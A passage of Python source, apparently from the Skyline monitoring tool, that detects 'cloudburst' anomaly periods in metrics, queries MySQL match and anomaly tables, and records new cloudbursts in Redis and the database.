second_stage_m66_candidate_metrics[base_name][custom_algorithm] = {}
second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies'] = new_anomalies
timer_end = timer()
logger.info('cloudburst :: find_cloudbursts :: found %s 2nd stage candidate_metrics with %s algorithm at 7 days from the 24 hour candidate metrics in %.6f seconds' % (
str(len(second_stage_m66_candidate_metrics)), custom_algorithm,
(timer_end - timer_start)))
candidate_metrics_key = 'luminosity.cloudburst.identified.long_period.%s' % str(key_reference_timestamp)
key_created = False
for base_name in list(second_stage_m66_candidate_metrics.keys()):
try:
self.redis_conn.hset(candidate_metrics_key, base_name, str(second_stage_m66_candidate_metrics[base_name]))
self.redis_conn.expire(candidate_metrics_key, 14400)
key_created = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to create %s Redis hash key - %s' % (
candidate_metrics_key, e))
if key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
candidate_metrics_key))
# OK so...
# Add to DB
# eating-snow
# https://soundcloud.com/user-76297227/eating-snow-this-emptiness-is-mine-andhim-remix-1?in_system_playlist=weekly%3A%3Aearthgecko
if len(second_stage_m66_candidate_metrics) > 0:
logger.info('cloudburst :: find_cloudbursts :: added %s 2nd stage candidate_metrics to %s Redis hash' % (
str(len(second_stage_m66_candidate_metrics)), candidate_metrics_key))
# Define each cloudburst incident by each period in terms of a start
# and end period of the cloudburst. A period is defined by a
# continuous triggering of m66, if there is a single m66 anomaly
# triggered then the period will be from anomaly_timestamp, until
# (anomaly_timestamp + resolution)
full_duration = until_timestamp - from_timestamp
found_cloudbursts = {}
for base_name in list(second_stage_m66_candidate_metrics.keys()):
try:
found_cloudbursts[base_name] = {}
anomalies = second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
initial_start_ts = int(anomalies[0][0])
start_ts = int(anomalies[0][0])
last_ts = start_ts
for ts in [int(ts) for ts, value in anomalies]:
if ts == initial_start_ts:
last_ts = ts
continue
if ts == (last_ts + resolution):
last_ts = ts
continue
if ts > (last_ts + resolution):
found_cloudbursts[base_name][start_ts] = {}
found_cloudbursts[base_name][start_ts]['resolution'] = resolution
found_cloudbursts[base_name][start_ts]['full_duration'] = full_duration
found_cloudbursts[base_name][start_ts]['from'] = from_timestamp
found_cloudbursts[base_name][start_ts]['until'] = until_timestamp
found_cloudbursts[base_name][start_ts]['start'] = start_ts
found_cloudbursts[base_name][start_ts]['end'] = last_ts
found_cloudbursts[base_name][start_ts]['duration'] = last_ts - start_ts
# This new timestamp that is more than one step from
# the last_ts defines the start of a new period
start_ts = ts
last_ts = ts
if initial_start_ts == last_ts:
last_ts = initial_start_ts + resolution
found_cloudbursts[base_name][start_ts] = {}
found_cloudbursts[base_name][start_ts]['resolution'] = resolution
found_cloudbursts[base_name][start_ts]['full_duration'] = full_duration
found_cloudbursts[base_name][start_ts]['from'] = from_timestamp
found_cloudbursts[base_name][start_ts]['until'] = until_timestamp
found_cloudbursts[base_name][start_ts]['start'] = start_ts
found_cloudbursts[base_name][start_ts]['end'] = last_ts
found_cloudbursts[base_name][start_ts]['duration'] = last_ts - start_ts
logger.info('cloudburst :: find_cloudbursts :: %s cloudburst periods identified for %s' % (
str(len(found_cloudbursts[base_name])), base_name))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add %s to found_cloudbursts dict - %s' % (base_name, e))
new_cloudburst_ids = []
known_cloudbursts = {}
matches_in_period = {}
matches_in_period['fp'] = {}
matches_in_period['layer'] = {}
matched_metric_ids = []
found_metric_cloudbursts = {}
period_anomalies = {}
cloudburst_metrics_key_created = False
if len(found_cloudbursts) > 0:
try:
engine, log_msg, trace = get_an_engine()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not get a MySQL engine to update cloudburst table - %s' % e)
if not engine:
logger.error('error :: cloudburst :: find_cloudbursts :: engine not obtained to update cloudburst table')
cloudburst_table = None
try:
cloudburst_table, log_msg, trace = cloudburst_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: cloudburst_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get cloudburst_table meta - %s' % e)
cloudburst_table = None
if cloudburst_table is None:
logger.error('error :: cloudburst :: find_cloudbursts :: cloudburst_table not defined')
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first matched id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
check_period = now_timestamp - long_period_check_last
first_cloudburst_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first cloudburst id in period')
try:
connection = engine.connect()
stmt = select([cloudburst_table.c.id]).\
where(cloudburst_table.c.timestamp >= check_period).\
order_by(cloudburst_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_cloudburst_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first cloudburst id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first cloudburst id in the period is: %s' % (
str(first_cloudburst_id_in_period)))
cloudburst_metrics_key = 'luminosity.cloudburst.metrics.%s' % str(key_reference_timestamp)
new_cloudburst_ids = []
known_cloudbursts = {}
period_cloudbursts = 0
# one_day_ago = now_timestamp - 86400
if first_cloudburst_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Added end so that the period can be compared
# stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
# where(cloudburst_table.c.timestamp >= one_day_ago)
stmt = select([cloudburst_table.c.metric_id, cloudburst_table.c.timestamp, cloudburst_table.c.end]).\
where(cloudburst_table.c.id >= first_cloudburst_id_in_period)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
if metric_id not in list(known_cloudbursts.keys()):
known_cloudbursts[metric_id] = {}
known_timestamp = row['timestamp']
# known_cloudbursts[metric_id][known_timestamp] = metric_id
# @added 20210819 - Feature #4164: luminosity - cloudbursts
known_cloudbursts[metric_id][known_timestamp] = {}
known_cloudbursts[metric_id][known_timestamp][metric_id] = metric_id
known_cloudbursts[metric_id][known_timestamp]['end'] = row['end']
period_cloudbursts += 1
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not get a MySQL engine to update cloudburst table - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: found %s cloudbursts recorded in the DB in the %s seconds period' % (
str(period_cloudbursts), str(long_period_check_last)))
####
# ONLY make the DB queries if there are unknown cloudbursts
for base_name in list(found_cloudbursts.keys()):
# logger.info('cloudburst :: find_cloudbursts :: checking cloudbursts to insert for %s' % base_name)
metric_id = None
try:
metric_id = metric_id_from_base_name(skyline_app, base_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get metric id for %s from db: %s' % (base_name, e))
continue
logger.info('cloudburst :: find_cloudbursts :: checking cloudbursts to insert for %s with metric_id: %s' % (
base_name, str(metric_id)))
known_metric_cloudburst_timestamps = []
try:
known_metric_cloudburst_timestamps = list(known_cloudbursts[metric_id].keys())
except KeyError:
known_metric_cloudburst_timestamps = []
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine known_metric_timestamps for %s - %s' % (base_name, e))
too_old = 0
for timestamp in list(found_cloudbursts[base_name].keys()):
try:
if timestamp < (now_timestamp - long_period_check_last):
too_old += 1
continue
if timestamp in known_metric_cloudburst_timestamps:
logger.info('cloudburst :: find_cloudbursts :: known cloudburst - skipping cloudburst at %s for %s' % (
str(timestamp), base_name))
continue
for known_metric_cloudburst_timestamp in known_metric_cloudburst_timestamps:
end = known_cloudbursts[metric_id][known_metric_cloudburst_timestamp]['end']
if timestamp >= known_metric_cloudburst_timestamp and timestamp <= end:
logger.info('cloudburst :: find_cloudbursts :: known cloudburst - skipping cloudburst at %s for %s, found in a period of cloudburst starting at %s and ending %s' % (
str(timestamp), base_name,
str(known_metric_cloudburst_timestamp), str(end)))
continue
if base_name not in list(found_metric_cloudbursts.keys()):
found_metric_cloudbursts[base_name] = {}
found_metric_cloudbursts[base_name][timestamp] = found_cloudbursts[base_name][timestamp]
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Added end so that the period can be compared
found_metric_cloudbursts[base_name][timestamp]['end'] = found_cloudbursts[base_name][timestamp]['end']
logger.info('cloudburst :: find_cloudbursts :: new cloudburst found for %s: %s' % (
base_name, str(found_metric_cloudbursts[base_name][timestamp])))
except Exception as err:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine if known cloudburst for %s - %s' % (base_name, err))
if base_name not in list(found_metric_cloudbursts.keys()):
logger.info('cloudburst :: find_cloudbursts :: all identified cloudbursts for %s are known and %s are too old' % (
base_name, str(too_old)))
else:
logger.info('cloudburst :: find_cloudbursts :: %s new cloudbursts for %s are not known' % (
str(len(list(found_metric_cloudbursts[base_name].keys()))), base_name))
# Consolidate back to back periods
if len(found_metric_cloudbursts) > 0:
for base_name in list(found_metric_cloudbursts.keys()):
cloudburst_tss = sorted(list(found_metric_cloudbursts[base_name].keys()))
merged = []
for c_index, cloudburst_ts in enumerate(cloudburst_tss):
if c_index == 0:
continue
if cloudburst_ts in merged:
continue
for c2_index, c_ts in enumerate(cloudburst_tss):
# if c2_index == 0:
# continue
if c_ts in merged:
continue
if c2_index == c_index:
continue
c_start = found_metric_cloudbursts[base_name][c_ts]['start']
c_end = found_metric_cloudbursts[base_name][c_ts]['end']
if cloudburst_ts >= c_start and cloudburst_ts <= c_end:
logger.info('%s falls within period of (%s, %s)' % (str(cloudburst_ts), str(c_start), str(c_end)))
ts_list = [ts for c_i, ts in enumerate(cloudburst_tss) if c_i == c2_index]
ts = ts_list[0]
# start = found_metric_cloudbursts[base_name][c_ts]['start']
end = found_metric_cloudbursts[base_name][c_ts]['end']
if end > found_metric_cloudbursts[base_name][cloudburst_ts]['end']:
logger.info('merging %s with %s' % (
str(found_metric_cloudbursts[base_name][ts]),
str(found_metric_cloudbursts[base_name][cloudburst_ts])))
new_end = found_metric_cloudbursts[base_name][c_ts]['end']
found_metric_cloudbursts[base_name][cloudburst_ts]['end'] = new_end
found_metric_cloudbursts[base_name][cloudburst_ts]['duration'] = new_end - cloudburst_ts
merge = True
if merge:
del found_metric_cloudbursts[base_name][c_ts]
merged.append(c_ts)
if len(found_metric_cloudbursts) > 0:
# Determine what Ionosphere matches occurred in the cloudburst
# period
# SELECT id,layer_id,fp_id,metric_id,anomaly_timestamp FROM ionosphere_layers_matched WHERE anomaly_timestamp > (now_timestamp - long_period_check_last)
# SELECT id,fp_id,metric_timestamp FROM ionosphere_matched WHERE metric_timestamp > (now_timestamp - long_period_check_last)
newer_than_timestamp = now_timestamp - long_period_check_last
ionosphere_matched_table = None
try:
ionosphere_matched_table, log_msg, trace = ionosphere_matched_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_matched_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_matched_table meta - %s' % e)
ionosphere_matched_table = None
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing index scans
# when the query uses metric_timestamp >= newer_than_timestamp, by
# first identifying the firsted matched id in the period and then
# basing the query on id >= first_matched_id_in_period, reduces the
# handler_read_next from 242561
# EXPLAIN SELECT ionosphere_matched.id, ionosphere_matched.fp_id, ionosphere_matched.metric_timestamp
# FROM ionosphere_matched
# WHERE ionosphere_matched.metric_timestamp >= 1629272047"
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# | 1 | SIMPLE | ionosphere_matched | index | NULL | features_profile_matched | 13 | NULL | 242561 | Using where; Using index |
# +------+-------------+--------------------+-------+---------------+--------------------------+---------+------+--------+--------------------------+
# to 339
# "EXPLAIN SELECT id FROM ionosphere_matched WHERE metric_timestamp >= 1629272047 ORDER BY id ASC LIMIT 1"
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# | 1 | SIMPLE | ionosphere_matched | index | NULL | PRIMARY | 4 | NULL | 1 | Using where |
# +------+-------------+--------------------+-------+---------------+---------+---------+------+------+-------------+
# "SELECT id FROM ionosphere_matched WHERE metric_timestamp >= 1629272047 ORDER BY id ASC LIMIT 1"
# +--------+
# | id |
# +--------+
# | 249655 |
# +--------+
# "EXPLAIN SELECT ionosphere_matched.id, ionosphere_matched.fp_id, ionosphere_matched.metric_timestamp
# FROM ionosphere_matched
# WHERE ionosphere_matched.id >= 249655"
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# | id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# | 1 | SIMPLE | ionosphere_matched | range | PRIMARY,features_profile_matched | features_profile_matched | 4 | NULL | 338 | Using where; Using index |
# +------+-------------+--------------------+-------+----------------------------------+--------------------------+---------+------+------+--------------------------+
# Determine first matched id in period
first_matched_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first ionosphere match id in period')
try:
connection = engine.connect()
stmt = select([ionosphere_matched_table.c.id]).\
where(ionosphere_matched_table.c.metric_timestamp >= newer_than_timestamp).\
order_by(ionosphere_matched_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_matched_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine ionosphere matches - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: the first fp match id for the period is %s' % (
str(first_matched_id_in_period)))
if first_matched_id_in_period:
logger.info('cloudburst :: find_cloudbursts :: determining ionosphere matches in period')
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([ionosphere_matched_table.c.id, ionosphere_matched_table.c.fp_id, ionosphere_matched_table.c.metric_timestamp]).\
# where(ionosphere_matched_table.c.metric_timestamp >= newer_than_timestamp)
stmt = select([ionosphere_matched_table.c.id, ionosphere_matched_table.c.fp_id, ionosphere_matched_table.c.metric_timestamp]).\
where(ionosphere_matched_table.c.id >= first_matched_id_in_period)
result = connection.execute(stmt)
for row in result:
match_id = row['id']
matches_in_period['fp'][match_id] = {}
matches_in_period['fp'][match_id]['fp_id'] = row['fp_id']
matches_in_period['fp'][match_id]['timestamp'] = match_id = row['metric_timestamp']
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine ionosphere matches - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s Ionosphere fp matches recorded in the DB for the period' % (
str(len(list(matches_in_period['fp'].keys())))))
ionosphere_layers_matched_table = None
try:
ionosphere_layers_matched_table, log_msg, trace = ionosphere_layers_matched_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_layers_matched_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_layers_matched_table meta - %s' % e)
ionosphere_layers_matched_table = None
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first matched id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
first_layers_matched_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first ionosphere layers match id in period')
try:
connection = engine.connect()
stmt = select([ionosphere_layers_matched_table.c.id]).\
where(ionosphere_layers_matched_table.c.anomaly_timestamp >= newer_than_timestamp).\
order_by(ionosphere_layers_matched_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_layers_matched_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first ionosphere match id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first ionosphere layers match id in the period is: %s' % (
str(first_layers_matched_id_in_period)))
if first_layers_matched_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([ionosphere_layers_matched_table.c.id, ionosphere_layers_matched_table.c.layer_id, ionosphere_layers_matched_table.c.fp_id, ionosphere_layers_matched_table.c.metric_id, ionosphere_layers_matched_table.c.anomaly_timestamp]).\
# where(ionosphere_layers_matched_table.c.anomaly_timestamp >= newer_than_timestamp)
stmt = select([ionosphere_layers_matched_table.c.id, ionosphere_layers_matched_table.c.layer_id, ionosphere_layers_matched_table.c.fp_id, ionosphere_layers_matched_table.c.metric_id, ionosphere_layers_matched_table.c.anomaly_timestamp]).\
where(ionosphere_layers_matched_table.c.id >= first_layers_matched_id_in_period)
result = connection.execute(stmt)
for row in result:
match_id = row['id']
matches_in_period['layer'][match_id] = {}
matches_in_period['layer'][match_id]['match_id'] = match_id
matches_in_period['layer'][match_id]['layer_id'] = row['layer_id']
matches_in_period['layer'][match_id]['fp_id'] = row['fp_id']
matches_in_period['layer'][match_id]['metric_id'] = row['metric_id']
matches_in_period['layer'][match_id]['timestamp'] = row['anomaly_timestamp']
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine ionosphere layers matches - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s Ionosphere layers matches recorded in the DB for the period' % (
str(len(list(matches_in_period['layer'].keys())))))
# matched_metric_ids = []
for layer_match_id in list(matches_in_period['layer'].keys()):
matched_metric_ids.append(matches_in_period['layer'][layer_match_id]['metric_id'])
# Determine metric_id from the ionosphere table from fps of matches
# but these are expensive queries, maybe not so much with IN
ionosphere_table = None
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: ionosphere_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get ionosphere_table meta - %s' % e)
ionosphere_table = None
fp_metric_ids_list = []
for match_id in list(matches_in_period['fp'].keys()):
# SELECT metric_id FROM
metric_id = None
fp_id = matches_in_period['fp'][match_id]['fp_id']
try:
connection = engine.connect()
stmt = select([ionosphere_table.c.metric_id]).\
where(ionosphere_table.c.id == fp_id)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
matches_in_period['fp'][match_id]['metric_id'] = metric_id
fp_metric_ids_list.append(metric_id)
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine metric_id from ionosphere - %s' % e)
fp_metric_ids_list = list(set(fp_metric_ids_list))
if fp_metric_ids_list:
matched_metric_ids = matched_metric_ids + fp_metric_ids_list
matched_metric_ids = list(set(matched_metric_ids))
anomalies_table = None
try:
anomalies_table, log_msg, trace = anomalies_table_meta(skyline_app, engine)
logger.info('cloudburst :: find_cloudbursts :: anomalies_table OK')
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get anomalies_table meta - %s' % e)
anomalies_table = None
# @added 20210819 - Feature #4164: luminosity - cloudbursts
# Determine first anomaly id in period to reduce the
# mysql.handler_read_next count from doing index scans and use
# primary key instead
first_anomaly_id_in_period = None
logger.info('cloudburst :: find_cloudbursts :: determining first anomaly id in period')
try:
connection = engine.connect()
stmt = select([anomalies_table.c.id]).\
where(anomalies_table.c.anomaly_timestamp >= newer_than_timestamp).\
order_by(anomalies_table.c.id.asc()).limit(1)
result = connection.execute(stmt)
for row in result:
first_anomaly_id_in_period = row['id']
break
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine first anomaly id - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: first anomaly id in the period is: %s' % (
str(first_anomaly_id_in_period)))
anomaly_id = None
period_anomalies = {}
if first_anomaly_id_in_period:
try:
connection = engine.connect()
# @modified 20210819 - Feature #4164: luminosity - cloudbursts
# Reduce the mysql.handler_read_next count from doing
# index scans and use primary key
# stmt = select([anomalies_table.c.id, anomalies_table.c.metric_id, anomalies_table.c.anomaly_timestamp, ]).\
# where(anomalies_table.c.anomaly_timestamp >= newer_than_timestamp)
stmt = select([anomalies_table.c.id, anomalies_table.c.metric_id, anomalies_table.c.anomaly_timestamp, ]).\
where(anomalies_table.c.id >= first_anomaly_id_in_period)
result = connection.execute(stmt)
for row in result:
metric_id = row['metric_id']
if metric_id not in list(period_anomalies.keys()):
period_anomalies[metric_id] = {}
anomaly_id = int(row['id'])
anomaly_timestamp = row['anomaly_timestamp']
period_anomalies[metric_id][anomaly_timestamp] = {}
period_anomalies[metric_id][anomaly_timestamp]['id'] = anomaly_id
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine metric_id from ionosphere - %s' % e)
logger.info('cloudburst :: find_cloudbursts :: %s anomalies found in the period' % str(len(period_anomalies)))
found_cloudbursts_to_add = {}
# cloudburst_metrics_key = 'luminosity.cloudburst.metrics.%s' % str(key_reference_timestamp)
# for base_name in list(found_cloudbursts.keys()):
for base_name in list(found_metric_cloudbursts.keys()):
metric_id = None
try:
metric_id = metric_id_from_base_name(skyline_app, base_name)
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to get metric id for %s from db: %s' % (base_name, e))
continue
logger.info('cloudburst :: find_cloudbursts :: checking anomalies and matches in period for %s with metric_id: %s' % (
base_name, str(metric_id)))
# Extract the matches for the metric and create a dictionary
# based on the match timestamp not the match id. Although there
# are both fp and layer matches they will never have the same
# timestamp because only a fp or a layer can match a potential
# anomaly, not both.
metric_matches = {}
if metric_id in matched_metric_ids:
for match_type in list(matches_in_period.keys()):
for match_id in list(matches_in_period[match_type].keys()):
try:
if metric_id == matches_in_period[match_type][match_id]['metric_id']:
if base_name not in list(metric_matches.keys()):
metric_matches[base_name] = {}
match_timestamp = matches_in_period[match_type][match_id]['timestamp']
metric_matches[base_name][match_timestamp] = matches_in_period[match_type][match_id]
metric_matches[base_name][match_timestamp]['match_type'] = match_type
metric_matches[base_name][match_timestamp]['match_id'] = match_id
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to populate fmetric_matches for %s - %s' % (base_name, e))
# Sort by end timestamps?
for cloudburst_ts in list(found_metric_cloudbursts[base_name].keys()):
cloudburst_ts_range = list(range((cloudburst_ts - resolution), (cloudburst_ts + resolution)))
try:
found_metric_cloudbursts[base_name][cloudburst_ts]['match_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['fp_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['layer_id'] = 0
found_metric_cloudbursts[base_name][cloudburst_ts]['anomaly_id'] = 0
metric_matches_present = 0
try:
metric_matches_present = len(list(metric_matches[base_name].keys()))
except KeyError:
metric_matches_present = 0
except Exception as e:
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine if the are matches for %s - %s' % (base_name, e))
if metric_matches_present:
for matched_ts in list(metric_matches[base_name].keys()):
# if matched_ts == cloudburst_ts:
if matched_ts in cloudburst_ts_range:
match_id = metric_matches[base_name][matched_ts]['match_id']
found_metric_cloudbursts[base_name][cloudburst_ts]['match_id'] = match_id
match_type = metric_matches[base_name][matched_ts]['match_type']
found_metric_cloudbursts[base_name][cloudburst_ts]['fp_id'] = metric_matches[base_name][matched_ts]['fp_id']
if match_type == 'layer':
found_metric_cloudbursts[base_name][cloudburst_ts]['layer_id'] = metric_matches[base_name][matched_ts]['layer_id']
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to populate found_metric_cloudbursts for %s - %s' % (base_name, e))
anomaly_id = None
# Use the period_anomalies single query rather than a query for
# every cloudburst timestamp which index scans the anomalies
# table and results in 700K mysql.handler_read_next operations,
# Skyline eating its own performance monitoring dog food.
# try:
# connection = engine.connect()
# stmt = select([anomalies_table.c.id]).\
# where(anomalies_table.c.anomaly_timestamp == cloudburst_ts).\
# where(anomalies_table.c.metric_id == metric_id)
# result = connection.execute(stmt)
# for row in result:
# anomaly_id = int(row['id'])
# connection.close()
cloudburst_ts_range_start = cloudburst_ts - resolution
cloudburst_ts_range_end = cloudburst_ts + resolution
cloudburst_ts_range = list(range(cloudburst_ts_range_start, cloudburst_ts_range_end))
try:
if metric_id in list(period_anomalies.keys()):
for anomaly_timestamp in list(period_anomalies[metric_id].keys()):
if anomaly_timestamp in cloudburst_ts_range:
try:
anomaly_id = period_anomalies[metric_id][anomaly_timestamp]['id']
if isinstance(anomaly_id, int):
break
except KeyError:
logger.warning('warning :: cloudburst :: find_cloudbursts :: due to KeyError in period_anomalies[%s][%s] could not determine anomaly_id in cloudburst_ts_range (%s, %s) for %s with metric_id %s from period_anomalies: %s' % (
str(metric_id), str(anomaly_timestamp),
str(cloudburst_ts_range_start),
str(cloudburst_ts_range_end), base_name,
str(metric_id),
str(period_anomalies[metric_id])))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: due to KeyError in period_anomalies[%s][%s] could not determine anomaly_id in cloudburst_ts_range (%s, %s) for %s with metric_id %s from period_anomalies: %s - %s' % (
str(metric_id), str(anomaly_timestamp),
str(cloudburst_ts_range_start),
str(cloudburst_ts_range_end), base_name,
str(metric_id),
str(period_anomalies[metric_id]), e))
if isinstance(anomaly_id, int):
found_metric_cloudbursts[base_name][cloudburst_ts]['anomaly_id'] = anomaly_id
if base_name not in list(found_cloudbursts_to_add.keys()):
found_cloudbursts_to_add[base_name] = {}
# This ensures that the longest cloudburst for the timestamp
# will be recorded because multiple cloudburst anomalies
# can be identified for a period but we only want to record
# one, the last one for each timestamp, for example if this
# not not done it results in:
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# | id | metric_id | timestamp | end | duration | from_timestamp | resolution | full_duration | anomaly_id | match_id | fp_id | layer_id |
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# | 87 | 1099 | 1628600400 | 1628171100 | 2700 | 1628068572 | 900 | 604800 | 0 | 0 | 0 | 0 |
# | 88 | 1099 | 1628600400 | 1628343900 | 3600 | 1628068572 | 900 | 604800 | 0 | 0 | 0 | 0 |
# +----+-----------+------------+------------+----------+----------------+------------+---------------+------------+----------+-------+----------+
# Here a cloudburt was identified at 1628600400
found_cloudbursts_to_add[base_name][cloudburst_ts] = found_metric_cloudbursts[base_name][cloudburst_ts]
# BREAK OUT HERE - before inserting into DB - testing
# continue
logger.info('cloudburst :: find_cloudbursts :: %s found_cloudbursts_to_add' % (
str(len(found_cloudbursts_to_add))))
db_added_at = int(time())
for base_name in list(found_cloudbursts_to_add.keys()):
# Sort by newest timestamps first
# cloudburst_tss = sorted(list(found_cloudbursts_to_add[base_name].keys()), reverse=True)
cloudburst_tss = sorted(list(found_cloudbursts_to_add[base_name].keys()))
for cloudburst_ts in cloudburst_tss:
# if cloudburst_ts > (now_timestamp - custom_check_last):
if cloudburst_ts < (now_timestamp - long_period_check_last):
continue
ts_added_for = 0
try:
ts_added_for = known_cloudbursts[metric_id][cloudburst_ts]
except KeyError:
ts_added_for = 0
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not determine if cloudburst_ts was added to known_cloudbursts[metric_id][cloudburst_ts] - %s' % e)
ts_added_for = 0
if ts_added_for:
logger.info('cloudburst :: find_cloudbursts :: cloudburst at %s for %s is present in known_cloudbursts not adding to the DB' % (
str(cloudburst_ts), base_name))
continue
# Do not just check timestamp, check to see if the cloudburst_ts
# is between timestamp and end
# So preprocess all the cloudbursts for a metric pre insertion
# combining cloudburst that are next to each other and those
# which overlap. These detections describe the same event only
# the event when detected in the next 5 minute run could
# describe the event diferently as it is describing it in a
# different dataset. The dataset starts and ends 5 minutes
# later therefore
new_cloudburst_id = None
try:
logger.info('cloudburst :: find_cloudbursts :: inserting cloudburst at %s for %s' % (
str(cloudburst_ts), base_name))
end_ts = found_cloudbursts_to_add[base_name][cloudburst_ts]['end']
from_ts = found_cloudbursts_to_add[base_name][cloudburst_ts]['from']
duration = found_cloudbursts_to_add[base_name][cloudburst_ts]['duration']
resolution = found_cloudbursts_to_add[base_name][cloudburst_ts]['resolution']
full_duration = found_cloudbursts_to_add[base_name][cloudburst_ts]['full_duration']
match_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['match_id']
fp_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['fp_id']
layer_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['layer_id']
anomaly_id = found_cloudbursts_to_add[base_name][cloudburst_ts]['anomaly_id']
connection = engine.connect()
ins = cloudburst_table.insert().values(
metric_id=metric_id,
timestamp=cloudburst_ts, end=end_ts, duration=duration,
from_timestamp=from_ts, resolution=resolution,
full_duration=full_duration, match_id=match_id,
fp_id=fp_id, layer_id=layer_id,
anomaly_id=anomaly_id, added_at=db_added_at)
